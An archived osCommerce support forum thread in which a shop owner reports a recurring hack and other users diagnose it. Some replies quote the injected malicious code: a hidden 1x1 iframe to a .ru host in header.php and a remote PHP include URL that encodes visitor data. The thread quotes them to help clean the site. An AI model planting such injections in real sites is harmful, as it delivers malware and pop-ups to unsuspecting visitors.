Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

My website was hacked ... please help


takemexico

Recommended Posts

Hi guys,

 

Thanks for taking the time to help me. It is terrible and sad that someone would do this right before the christmas season but what can we do, some people are just evil.

 

My website Take Mexico was hacked about a week ago, I tried changing the files that says that are affected but in the matter of few hours the hack comes back again. I was wondering if someone could help me out. What do you guys suggest?

 

Also how much would it cost to buy a new template and have all my products and descriptions re-uploaded? I know which template I want it's just the actual work of transferring all the files and descriptions. If anyone is interested in taking up this project and making some money you can contact me at [email protected].

 

Thanks for your help,

Take Mexico

Francisco Diaz :D

Link to comment
Share on other sites

It looks like its gone.... happened first time with an error... the popup window came up with page not found...

 

Reloaded page and could not duplicate...

 

Dumped Cache.... tried link again no popup with porn site

Read, read, read, test, read, read, test, read, implement.

Always back up your site and database before changes.

Always back up on a regular basis.

Link to comment
Share on other sites

I checked out the site, popup opened, but address could not be found. At leat you have that going for you. The first time I opened the site this error message was at the top.

Warning: Cannot modify header information - headers already sent by (output started at http://user7.phpinclude.ru/?d3d3LnRha2VtZXhpY28uY29t.d3d3LnRha2VtZXhpY28uY29t.Lw==.TW96aWxsYS81LjAgKFdpbmRvd
3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS43LjEyKSBHZWNrby8yMDA1MDkxNSBGaXJlZm
94LzEuMC43.NjUuMjYuMTg1Ljg3:1) in /home/takemexi/public_html/store/includes/functions/general.php on line 1188

 

I don't know if the two are related (.ru - makes me think it is) but it is worth taking a look.

Link to comment
Share on other sites

I checked out the site, popup opened, but address could not be found. At leat you have that going for you. The first time I opened the site this error message was at the top.
Warning: Cannot modify header information - headers already sent by (output started at http://user7.phpinclude.ru/?d3d3LnRha2VtZXhpY28uY29t.d3d3LnRha2VtZXhpY28uY29t.Lw==.TW96aWxsYS81LjAgKFdpbmRvd
3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS43LjEyKSBHZWNrby8yMDA1MDkxNSBGaXJlZm
94LzEuMC43.NjUuMjYuMTg1Ljg3:1) in /home/takemexi/public_html/store/includes/functions/general.php on line 1188

 

I don't know if the two are related (.ru - makes me think it is) but it is worth taking a look.

 

I saw the same thing. That definitely does not belong in there.

 

You'll need to figure out how they're getting write access to the includes directory and check through that general.php file.

 

Is the standard .htaccess file in the includes directory? Some people take that out because of image problems.

 

Is admin protected? Rename and move that folder.

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

Link to comment
Share on other sites

it worked for me, but the popup porn site made me think that was YOUR site.. definately not a good thing for potential customers to see.

 

it only loaded once, once i clicked around a bit and went back to the main page the header warning and the pop up did not occur. you should do a search in all of your .php files for ".ru"

 

the error was calling a peculiar url that happened to be a .ru domain.

if you find that, you may be able to find out which files they edited

 

just download every .php file from your website and run the windows' search feature for only the folder that holds the php files, that way it should only take a minute or so for the results (it won't search your entire C: drive)

Link to comment
Share on other sites

You need to look in includes/header.php for this code injection:

 

<iframe src="http://user25.iframe.ru/" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe><br />

 

That link is injecting this:

headers already sent by (output started at http://user7.phpinclude.ru/?d3d3LnRha2VtZXhpY28uY29t.d3d3LnRha2VtZXhpY28uY29t.Lw==.TW96aWxsYS80LjAgKGNvbXBhd
GlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMTsgU1YxKQ==.MTk1LjEzNy40LjE2Mg==:1) in <b>/home/takemexi/public_html/store/includes/functions/general.php</b> on line <b>1188</b><br />

 

The good news is that your database is probably okay, but I'd dump the files and start with a new (updated and patched) osCommerce MS2 - the link to which is under the "Latest News" link on this forums homepage. It looks as though your site has run foul of the HTTP Header Injection exploit.

 

There is something else going on with this site - causing a FrontPage pop-up to try to start installing FrontPage modules. I'd advise others against going to the site until the hack is cleared out.

 

Vger

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...